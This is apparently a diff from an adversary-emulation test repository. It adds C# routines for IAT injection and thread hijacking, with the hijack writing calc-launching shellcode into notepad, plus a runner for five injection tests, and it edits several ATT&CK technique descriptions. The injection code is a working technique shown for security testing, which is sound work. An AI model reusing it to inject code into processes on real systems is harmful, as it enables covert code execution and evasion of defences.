+					ReadProcessMemory(hProcess, (IntPtr)funcAddress, buffer1, buffer1.Length, ref bytesRead);
+
+					// Get shellcode address
+					byte[] shellcodePtr = BitConverter.GetBytes((Int64)shellcodeAddress);
+
+					// Modify permissions to allow IAT modification
+					uint oldProtect = 0;
+					bool protectbool = VirtualProtectEx(hProcess, (IntPtr)funcAddress, shellcodePtr.Length, PAGE_EXECUTE_READWRITE, out oldProtect);
+
+					// Modfiy IAT to point to shellcode
+					IntPtr iatBytesWritten = IntPtr.Zero;
+					bool success = WriteProcessMemory(hProcess, (IntPtr)funcAddress, shellcodePtr, shellcodePtr.Length, out iatBytesWritten);
+
+					// Read IAT to confirm new value
+					bytesRead = 0;
+					byte[] buffer = new byte[8];
+					ReadProcessMemory(hProcess, (IntPtr)funcAddress, buffer, buffer.Length, ref bytesRead);
+
+
+					flag = true;
+					break;
+				}
+			}
+			j++;
+		}
+	}
+
+
+	public struct IMAGE_DOS_HEADER
+	{      // DOS .EXE header
+		public UInt16 e_magic;              // Magic number
+		public UInt16 e_cblp;               // Bytes on last page of file
+		public UInt16 e_cp;                 // Pages in file
+		public UInt16 e_crlc;               // Relocations
+		public UInt16 e_cparhdr;            // Size of header in paragraphs
+		public UInt16 e_minalloc;           // Minimum extra paragraphs needed
+		public UInt16 e_maxalloc;           // Maximum extra paragraphs needed
+		public UInt16 e_ss;                 // Initial (relative) SS value
+		public UInt16 e_sp;                 // Initial SP value
+		public UInt16 e_csum;               // Checksum
+		public UInt16 e_ip;                 // Initial IP value
+		public UInt16 e_cs;                 // Initial (relative) CS value
+		public UInt16 e_lfarlc;             // File address of relocation table
+		public UInt16 e_ovno;               // Overlay number
+		public UInt16 e_res_0;              // Reserved words
+		public UInt16 e_res_1;              // Reserved words
+		public UInt16 e_res_2;              // Reserved words
+		public UInt16 e_res_3;              // Reserved words
+		public UInt16 e_oemid;              // OEM identifier (for e_oeminfo)
+		public UInt16 e_oeminfo;            // OEM information; e_oemid specific
+		public UInt16 e_res2_0;             // Reserved words
+		public UInt16 e_res2_1;             // Reserved words
+		public UInt16 e_res2_2;             // Reserved words
+		public UInt16 e_res2_3;             // Reserved words
+		public UInt16 e_res2_4;             // Reserved words
+		public UInt16 e_res2_5;             // Reserved words
+		public UInt16 e_res2_6;             // Reserved words
+		public UInt16 e_res2_7;             // Reserved words
+		public UInt16 e_res2_8;             // Reserved words
+		public UInt16 e_res2_9;             // Reserved words
+		public UInt32 e_lfanew;             // File address of new exe header
+	}
+
+	[StructLayout(LayoutKind.Sequential)]
+	public struct IMAGE_DATA_DIRECTORY
+	{
+		public UInt32 VirtualAddress;
+		public UInt32 Size;
+	}
+
+	[StructLayout(LayoutKind.Sequential, Pack = 1)]
+	public struct IMAGE_OPTIONAL_HEADER32
+	{
+		public UInt16 Magic;
+		public Byte MajorLinkerVersion;
+		public Byte MinorLinkerVersion;
+		public UInt32 SizeOfCode;
+		public UInt32 SizeOfInitializedData;
+		public UInt32 SizeOfUninitializedData;
+		public UInt32 AddressOfEntryPoint;
+		public UInt32 BaseOfCode;
+		public UInt32 BaseOfData;
+		public UInt32 ImageBase;
+		public UInt32 SectionAlignment;
+		public UInt32 FileAlignment;
+		public UInt16 MajorOperatingSystemVersion;
+		public UInt16 MinorOperatingSystemVersion;
+		public UInt16 MajorImageVersion;
+		public UInt16 MinorImageVersion;
+		public UInt16 MajorSubsystemVersion;
+		public UInt16 MinorSubsystemVersion;
+		public UInt32 Win32VersionValue;
+		public UInt32 SizeOfImage;
+		public UInt32 SizeOfHeaders;
+		public UInt32 CheckSum;
+		public UInt16 Subsystem;
+		public UInt16 DllCharacteristics;
+		public UInt32 SizeOfStackReserve;
+		public UInt32 SizeOfStackCommit;
+		public UInt32 SizeOfHeapReserve;
+		public UInt32 SizeOfHeapCommit;
+		public UInt32 LoaderFlags;
+		public UInt32 NumberOfRvaAndSizes;
+
+		public IMAGE_DATA_DIRECTORY ExportTable;
+		public IMAGE_DATA_DIRECTORY ImportTable;
+		public IMAGE_DATA_DIRECTORY ResourceTable;
+		public IMAGE_DATA_DIRECTORY ExceptionTable;
+		public IMAGE_DATA_DIRECTORY CertificateTable;
+		public IMAGE_DATA_DIRECTORY BaseRelocationTable;
+		public IMAGE_DATA_DIRECTORY Debug;
+		public IMAGE_DATA_DIRECTORY Architecture;
+		public IMAGE_DATA_DIRECTORY GlobalPtr;
+		public IMAGE_DATA_DIRECTORY TLSTable;
+		public IMAGE_DATA_DIRECTORY LoadConfigTable;
+		public IMAGE_DATA_DIRECTORY BoundImport;
+		public IMAGE_DATA_DIRECTORY IAT;
+		public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
+		public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
+		public IMAGE_DATA_DIRECTORY Reserved;
+	}
+
+	[StructLayout(LayoutKind.Sequential, Pack = 1)]
+	public struct IMAGE_OPTIONAL_HEADER64
+	{
+		public UInt16 Magic;
+		public Byte MajorLinkerVersion;
+		public Byte MinorLinkerVersion;
+		public UInt32 SizeOfCode;
+		public UInt32 SizeOfInitializedData;
+		public UInt32 SizeOfUninitializedData;
+		public UInt32 AddressOfEntryPoint;
+		public UInt32 BaseOfCode;
+		public UInt64 ImageBase;
+		public UInt32 SectionAlignment;
+		public UInt32 FileAlignment;
+		public UInt16 MajorOperatingSystemVersion;
+		public UInt16 MinorOperatingSystemVersion;
+		public UInt16 MajorImageVersion;
+		public UInt16 MinorImageVersion;
+		public UInt16 MajorSubsystemVersion;
+		public UInt16 MinorSubsystemVersion;
+		public UInt32 Win32VersionValue;
+		public UInt32 SizeOfImage;
+		public UInt32 SizeOfHeaders;
+		public UInt32 CheckSum;
+		public UInt16 Subsystem;
+		public UInt16 DllCharacteristics;
+		public UInt64 SizeOfStackReserve;
+		public UInt64 SizeOfStackCommit;
+		public UInt64 SizeOfHeapReserve;
+		public UInt64 SizeOfHeapCommit;
+		public UInt32 LoaderFlags;
+		public UInt32 NumberOfRvaAndSizes;
+
+		public IMAGE_DATA_DIRECTORY ExportTable;
+		public IMAGE_DATA_DIRECTORY ImportTable;
+		public IMAGE_DATA_DIRECTORY ResourceTable;
+		public IMAGE_DATA_DIRECTORY ExceptionTable;
+		public IMAGE_DATA_DIRECTORY CertificateTable;
+		public IMAGE_DATA_DIRECTORY BaseRelocationTable;
+		public IMAGE_DATA_DIRECTORY Debug;
+		public IMAGE_DATA_DIRECTORY Architecture;
+		public IMAGE_DATA_DIRECTORY GlobalPtr;
+		public IMAGE_DATA_DIRECTORY TLSTable;
+		public IMAGE_DATA_DIRECTORY LoadConfigTable;
+		public IMAGE_DATA_DIRECTORY BoundImport;
+		public IMAGE_DATA_DIRECTORY IAT;
+		public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
+		public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
+		public IMAGE_DATA_DIRECTORY Reserved;
+	}
+
+	[StructLayout(LayoutKind.Sequential, Pack = 1)]
+	public struct IMAGE_FILE_HEADER
+	{
+		public UInt16 Machine;
+		public UInt16 NumberOfSections;
+		public UInt32 TimeDateStamp;
+		public UInt32 PointerToSymbolTable;
+		public UInt32 NumberOfSymbols;
+		public UInt16 SizeOfOptionalHeader;
+		public UInt16 Characteristics;
+	}
+
+	[StructLayout(LayoutKind.Explicit)]
+	public struct IMAGE_SECTION_HEADER
+	{
+		[FieldOffset(0)]
+		[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
+		public char[] Name;
+		[FieldOffset(8)]
+		public UInt32 VirtualSize;
+		[FieldOffset(12)]
+		public UInt32 VirtualAddress;
+		[FieldOffset(16)]
+		public UInt32 SizeOfRawData;
+		[FieldOffset(20)]
+		public UInt32 PointerToRawData;
+		[FieldOffset(24)]
+		public UInt32 PointerToRelocations;
+		[FieldOffset(28)]
+		public UInt32 PointerToLinenumbers;
+		[FieldOffset(32)]
+		public UInt16 NumberOfRelocations;
+		[FieldOffset(34)]
+		public UInt16 NumberOfLinenumbers;
+		[FieldOffset(36)]
+		public DataSectionFlags Characteristics;
+
+		public string Section
+		{
+			get { return new string(Name); }
+		}
+	}
+
+	[StructLayout(LayoutKind.Sequential)]
+	public struct IMAGE_IMPORT_DESCRIPTOR
+	{
+		public uint OriginalFirstThunk;
+		public uint TimeDateStamp;
+		public uint ForwarderChain;
+		public uint Name;
+		public uint FirstThunk;
+	}
+
+	[StructLayout(LayoutKind.Sequential)]
+	public struct IMAGE_BASE_RELOCATION
+	{
+		public uint VirtualAdress;
+		public uint SizeOfBlock;
+	}
+
+	[Flags]
+	public enum DataSectionFlags : uint
+	{
+
+		Stub = 0x00000000,
+
+	}
+
+	public static T FromBinaryReader<T>(BinaryReader reader)
+	{
+		// Read in a byte array
+		byte[] bytes = reader.ReadBytes(Marshal.SizeOf(typeof(T)));
+
+		// Pin the managed memory while, copy it out the data, then unpin it
+		GCHandle handle = GCHandle.Alloc(bytes, GCHandleType.Pinned);
+		T theStructure = (T)Marshal.PtrToStructure(handle.AddrOfPinnedObject(), typeof(T));
+		handle.Free();
+
+		return theStructure;
+	}
+
+
+	public static bool Is32BitHeader(IMAGE_FILE_HEADER fileHeader)
+	{
+			UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100;
+			return (IMAGE_FILE_32BIT_MACHINE & fileHeader.Characteristics) == IMAGE_FILE_32BIT_MACHINE;
+	}
+
+
+	// Process privileges
+	public const int PROCESS_CREATE_THREAD = 0x0002;
+	public const int PROCESS_QUERY_INFORMATION = 0x0400;
+	public const int PROCESS_VM_OPERATION = 0x0008;
+	public const int PROCESS_VM_WRITE = 0x0020;
+	public const int PROCESS_VM_READ = 0x0010;
+	public const int PROCESS_ALL_ACCESS = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
+
+	// Memory permissions
+	public const uint MEM_COMMIT = 0x00001000;
+	public const uint MEM_RESERVE = 0x00002000;
+	public const uint PAGE_READWRITE = 0x04;
+	public const uint PAGE_EXECUTE_READWRITE = 0x40;
+
+
+	[DllImport("kernel32.dll")]
+	public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
+
+	[DllImport("kernel32.dll")]
+	public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);
+
+	[DllImport("kernel32.dll")]
+	public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect);
+
+	[DllImport("kernel32.dll")]
+	public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten);
+
+	[DllImport("kernel32.dll")]
+	public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, ref int lpNumberOfBytesRead);
+
+	[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
+	public static extern IntPtr LoadLibrary(string lpFileName);
+
+	[DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
+	public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
+
+}
+
+public class ThreadHijack
+{
+    // Import API Functions
+	[DllImport("kernel32.dll")]
+    public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
+
+	[DllImport("kernel32.dll")]
+    static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, uint dwThreadId);
+
+	[DllImport("kernel32.dll")]
+    static extern uint SuspendThread(IntPtr hThread);
+
+	[DllImport("kernel32.dll", SetLastError = true)]
+    static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
+
+	[DllImport("kernel32.dll", SetLastError = true)]
+    static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
+
+	[DllImport("kernel32.dll")]
+    static extern int ResumeThread(IntPtr hThread);
+
+	[DllImport("kernel32", CharSet = CharSet.Auto,SetLastError = true)]
+    static extern bool CloseHandle(IntPtr handle);
+
+    [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
+    static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
+
+    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
+    static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,uint dwSize, uint flAllocationType, uint flProtect);
+
+    [DllImport("kernel32.dll", SetLastError = true)]
+    static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
+
+	[DllImport("kernel32.dll")]
+	static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, ref int lpNumberOfBytesRead);
+
+
+    // Process privileges
+    const int PROCESS_CREATE_THREAD = 0x0002;
+    const int PROCESS_QUERY_INFORMATION = 0x0400;
+    const int PROCESS_VM_OPERATION = 0x0008;
+    const int PROCESS_VM_WRITE = 0x0020;
+    const int PROCESS_VM_READ = 0x0010;
+
+    // Memory permissions
+    const uint MEM_COMMIT = 0x00001000;
+    const uint MEM_RESERVE = 0x00002000;
+    const uint PAGE_READWRITE = 4;
+	const uint PAGE_EXECUTE_READWRITE = 0x40;
+
+	[Flags]
+    public enum ThreadAccess : int
+    {
+      TERMINATE = (0x0001),
+      SUSPEND_RESUME = (0x0002),
+      GET_CONTEXT = (0x0008),
+      SET_CONTEXT = (0x0010),
+      SET_INFORMATION = (0x0020),
+      QUERY_INFORMATION = (0x0040),
+      SET_THREAD_TOKEN = (0x0080),
+      IMPERSONATE = (0x0100),
+      DIRECT_IMPERSONATION = (0x0200),
+	  THREAD_HIJACK = SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT,
+	  THREAD_ALL = TERMINATE | SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT | SET_INFORMATION | QUERY_INFORMATION | SET_THREAD_TOKEN | IMPERSONATE | DIRECT_IMPERSONATION
+    }
+
+	public enum CONTEXT_FLAGS : uint
+	{
+	   CONTEXT_i386 = 0x10000,
+	   CONTEXT_i486 = 0x10000,   //  same as i386
+	   CONTEXT_CONTROL = CONTEXT_i386 | 0x01, // SS:SP, CS:IP, FLAGS, BP
+	   CONTEXT_INTEGER = CONTEXT_i386 | 0x02, // AX, BX, CX, DX, SI, DI
+	   CONTEXT_SEGMENTS = CONTEXT_i386 | 0x04, // DS, ES, FS, GS
+	   CONTEXT_FLOATING_POINT = CONTEXT_i386 | 0x08, // 387 state
+	   CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10, // DB 0-3,6,7
+	   CONTEXT_EXTENDED_REGISTERS = CONTEXT_i386 | 0x20, // cpu specific extensions
+	   CONTEXT_FULL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS,
+	   CONTEXT_ALL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS |  CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS |  CONTEXT_EXTENDED_REGISTERS
+	}
+
+	// x86 float save
+	[StructLayout(LayoutKind.Sequential)]
+	public struct FLOATING_SAVE_AREA
+	{
+		 public uint ControlWord;
+		 public uint StatusWord;
+		 public uint TagWord;
+		 public uint ErrorOffset;
+		 public uint ErrorSelector;
+		 public uint DataOffset;
+		 public uint DataSelector;
+		 [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
+		 public byte[] RegisterArea;
+		 public uint Cr0NpxState;
+	}
+
+	// x86 context structure (not used in this example)
+	[StructLayout(LayoutKind.Sequential)]
+	public struct CONTEXT
+	{
+		 public uint ContextFlags; //set this to an appropriate value
+		 // Retrieved by CONTEXT_DEBUG_REGISTERS
+		 public uint Dr0;
+		 public uint Dr1;
+		 public uint Dr2;
+		 public uint Dr3;
+		 public uint Dr6;
+		 public uint Dr7;
+		 // Retrieved by CONTEXT_FLOATING_POINT
+		 public FLOATING_SAVE_AREA FloatSave;
+		 // Retrieved by CONTEXT_SEGMENTS
+		 public uint SegGs;
+		 public uint SegFs;
+		 public uint SegEs;
+		 public uint SegDs;
+		 // Retrieved by CONTEXT_INTEGER
+		 public uint Edi;
+		 public uint Esi;
+		 public uint Ebx;
+		 public uint Edx;
+		 public uint Ecx;
+		 public uint Eax;
+		 // Retrieved by CONTEXT_CONTROL
+		 public uint Ebp;
+		 public uint Eip;
+		 public uint SegCs;
+		 public uint EFlags;
+		 public uint Esp;
+		 public uint SegSs;
+		 // Retrieved by CONTEXT_EXTENDED_REGISTERS
+		 [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
+		 public byte[] ExtendedRegisters;
+	}
+
+	// x64 m128a
+	[StructLayout(LayoutKind.Sequential)]
+	public struct M128A
+	{
+		 public ulong High;
+		 public long Low;
+
+		 public override string ToString()
+		 {
+		return string.Format("High:{0}, Low:{1}", this.High, this.Low);
+		 }
+	}
+
+	// x64 save format
+	[StructLayout(LayoutKind.Sequential, Pack = 16)]
+	public struct XSAVE_FORMAT64
+	{
+		public ushort ControlWord;
+		public ushort StatusWord;
+		public byte TagWord;
+		public byte Reserved1;
+		public ushort ErrorOpcode;
+		public uint ErrorOffset;
+		public ushort ErrorSelector;
+		public ushort Reserved2;
+		public uint DataOffset;
+		public ushort DataSelector;
+		public ushort Reserved3;
+		public uint MxCsr;
+		public uint MxCsr_Mask;
+
+		[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
+		public M128A[] FloatRegisters;
+
+		[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
+		public M128A[] XmmRegisters;
+
+		[MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
+		public byte[] Reserved4;
+	}
+
+	// x64 context structure
+	[StructLayout(LayoutKind.Sequential, Pack = 16)]
+	public struct CONTEXT64
+	{
+		public ulong P1Home;
+		public ulong P2Home;
+		public ulong P3Home;
+		public ulong P4Home;
+		public ulong P5Home;
+		public ulong P6Home;
+
+		public CONTEXT_FLAGS ContextFlags;
+		public uint MxCsr;
+
+		public ushort SegCs;
+		public ushort SegDs;
+		public ushort SegEs;
+		public ushort SegFs;
+		public ushort SegGs;
+		public ushort SegSs;
+		public uint EFlags;
+
+		public ulong Dr0;
+		public ulong Dr1;
+		public ulong Dr2;
+		public ulong Dr3;
+		public ulong Dr6;
+		public ulong Dr7;
+
+		public ulong Rax;
+		public ulong Rcx;
+		public ulong Rdx;
+		public ulong Rbx;
+		public ulong Rsp;
+		public ulong Rbp;
+		public ulong Rsi;
+		public ulong Rdi;
+		public ulong R8;
+		public ulong R9;
+		public ulong R10;
+		public ulong R11;
+		public ulong R12;
+		public ulong R13;
+		public ulong R14;
+		public ulong R15;
+		public ulong Rip;
+
+		public XSAVE_FORMAT64 DUMMYUNIONNAME;
+
+		[MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
+		public M128A[] VectorRegister;
+		public ulong VectorControl;
+
+		public ulong DebugControl;
+		public ulong LastBranchToRip;
+		public ulong LastBranchFromRip;
+		public ulong LastExceptionToRip;
+		public ulong LastExceptionFromRip;
+		}
+
+    public static int Inject()
+    {
+		// Get target process by name
+
+		Process targetProcess = Process.GetProcessesByName("notepad")[0];
+
+
+		// Open and Suspend first thread
+		ProcessThread pT = targetProcess.Threads[0];
+
+		IntPtr pOpenThread = OpenThread(ThreadAccess.THREAD_HIJACK, false, (uint)pT.Id);
+		SuspendThread(pOpenThread);
+
+		// Get thread context
+		CONTEXT64 tContext = new CONTEXT64();
+		tContext.ContextFlags = CONTEXT_FLAGS.CONTEXT_FULL;
+		if (GetThreadContext(pOpenThread, ref tContext))
+		{
+
+		}
+
+		// WinExec shellcode from: https://github.com/peterferrie/win-exec-calc-shellcode
+		// Compiled with:
+		// nasm w64-exec-calc-shellcode.asm -DSTACK_ALIGN=TRUE -DFUNC=TRUE -DCLEAN=TRUE -o w64-exec-calc-shellcode.bin
+		byte[] payload = new byte[112] {
+		0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3
+		};
+
+		// Once shellcode has executed return to thread original EIP address (mov to rax then jmp to address)
+		byte[] mov_rax = new byte[2] {
+			0x48, 0xb8
+		};
+		byte[] jmp_address = BitConverter.GetBytes(tContext.Rip);
+		byte[] jmp_rax = new byte[2] {
+			0xff, 0xe0
+		};
+
+		// Build shellcode
+		byte[] shellcode = new byte[payload.Length + mov_rax.Length + jmp_address.Length + jmp_rax.Length];
+		payload.CopyTo(shellcode, 0);
+		mov_rax.CopyTo(shellcode, payload.Length);
+		jmp_address.CopyTo(shellcode, payload.Length+mov_rax.Length);
+		jmp_rax.CopyTo(shellcode, payload.Length+mov_rax.Length+jmp_address.Length);
+
+		// OpenProcess to allocate memory
+		IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
+
+		// Allocate memory for shellcode within process
+		IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+
+		// Write shellcode within process
+		UIntPtr bytesWritten;
+        bool resp1 = WriteProcessMemory(procHandle, allocMemAddress, shellcode, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
+
+		// Read memory to view shellcode
+		int bytesRead = 0;
+        byte[] buffer = new byte[shellcode.Length];
+		ReadProcessMemory(procHandle, allocMemAddress, buffer, buffer.Length, ref bytesRead);
+
+		// Set context EIP to location of shellcode
+		tContext.Rip=(ulong)allocMemAddress.ToInt64();
+
+		// Apply new context to suspended thread
+		if(!SetThreadContext(pOpenThread, ref tContext))
+		{
+
+		}
+		if (GetThreadContext(pOpenThread, ref tContext))
+		{
+
+		}
+		// Resume the thread, redirecting execution to shellcode, then back to original process
+
+		ResumeThread(pOpenThread);
+
+        return 0;
+    }
+}
+
+public class Program
+{
+	public static void Main()
+	{
+		//Test One:
+		Console.WriteLine("{0}", "#1 ProcessInject");
+		ProcessInject.Inject();
+		Console.WriteLine("{0}", "ProcessInject Complete");
+		//Test Two:
+		Console.WriteLine("{0}", "#2 ApcInjectionAnyProcess");
+		ApcInjectionAnyProcess.Inject();
+		Console.WriteLine("{0}", "ApcInjectionAnyProcess Complete");
+		//Test Three:
+		Console.WriteLine("{0}", "#3 ApcInjectionNewProcess");
+		ApcInjectionNewProcess.Inject();
+		Console.WriteLine("{0}", "ApcInjectionNewProcess Complete");
+		//Test Four:
+		Console.WriteLine("{0}", "#4 IatInjection");
+		IatInjection.Inject();
+		Console.WriteLine("{0}", "IatInjection Complete");
+		//Test Five:
+		Console.WriteLine("{0}", "#5 ThreadHijack");
+		ThreadHijack.Inject();
+		Console.WriteLine("{0}", "ThreadHijack Complete ");
+
+	}
+
+}
@@ -1,24 +1,12 @@
 # T1056 - Input Capture
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1056)
-<blockquote>Adversaries can use methods of capturing user input for obtaining credentials for Valid Accounts and information Collection that include keylogging and user input field interception.
+<blockquote>Adversaries can use methods of capturing user input for obtaining credentials for [Valid Accounts](https://attack.mitre.org/techniques/T1078) and information Collection that include keylogging and user input field interception.

 Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes, (Citation: Adventures of a Keystroke) but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider. (Citation: Wrightson 2012)

-Keylogging is likely to be used to acquire credentials for new access opportunities when Credential Dumping efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises.
+Keylogging is likely to be used to acquire credentials for new access opportunities when [Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises.

-Adversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through External Remote Services and Valid Accounts or as part of the initial compromise by exploitation of the externally facing web service. (Citation: Volexity Virtual Private Keylogging)
-
-Detection: Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include SetWindowsHook, GetKeyState, and GetAsynceyState. (Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes and detect driver installs, as well as looking for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.
-
-Monitor the Registry for the addition of a Custom Credential Provider. (Citation: Wrightson 2012) Detection of compromised Valid Accounts in use by adversaries may help to catch the result of user input interception if new techniques are used.
-
-Platforms: Linux, macOS, Windows
-
-Data Sources: Windows Registry, Kernel drivers, Process monitoring, API monitoring
-
-Permissions Required: Administrator, SYSTEM
-
-Contributors: John Lambert, Microsoft Threat Intelligence Center</blockquote>
+Adversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service. (Citation: Volexity Virtual Private Keylogging)</blockquote>

 ## Atomic Tests

@@ -2,25 +2,13 @@
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1057)
 <blockquote>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.

-===Windows===
+### Windows

-An example command that would obtain details on processes is "tasklist" using the Tasklist utility.
+An example command that would obtain details on processes is "tasklist" using the [Tasklist](https://attack.mitre.org/software/S0057) utility.

-===Mac and Linux===
+### Mac and Linux

-In Mac and Linux, this is accomplished with the <code>ps</code> command.
-
-Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
-Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
-
-Platforms: Linux, macOS, Windows
-
-Data Sources: Process command-line parameters, Process monitoring
-
-Permissions Required: User, Administrator, SYSTEM
-
-System Requirements: Administrator, SYSTEM may provide better process ownership details</blockquote>
+In Mac and Linux, this is accomplished with the <code>ps</code> command.</blockquote>

 ## Atomic Tests

@@ -1,18 +1,8 @@
 # T1059 - Command-Line Interface
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059)
-<blockquote>Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is cmd, which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task).
+<blockquote>Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is [cmd](https://attack.mitre.org/software/S0106), which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. [Scheduled Task](https://attack.mitre.org/techniques/T1053)).

-Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.
-
-Detection: Command-line interface activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools.
-
-Platforms: Linux, Windows, macOS
-
-Data Sources: Process command-line parameters, Process monitoring
-
-Permissions Required: Administrator, SYSTEM, User
-
-Remote Support: No</blockquote>
+Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.</blockquote>

 ## Atomic Tests

@@ -1,18 +1,22 @@
-# T1060 - Registry Run Keys / Start Folder
+# T1060 - Registry Run Keys / Startup Folder
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1060)
-<blockquote>Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) The program will be executed under the context of the user and will have the account's associated permissions level.
+<blockquote>Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.

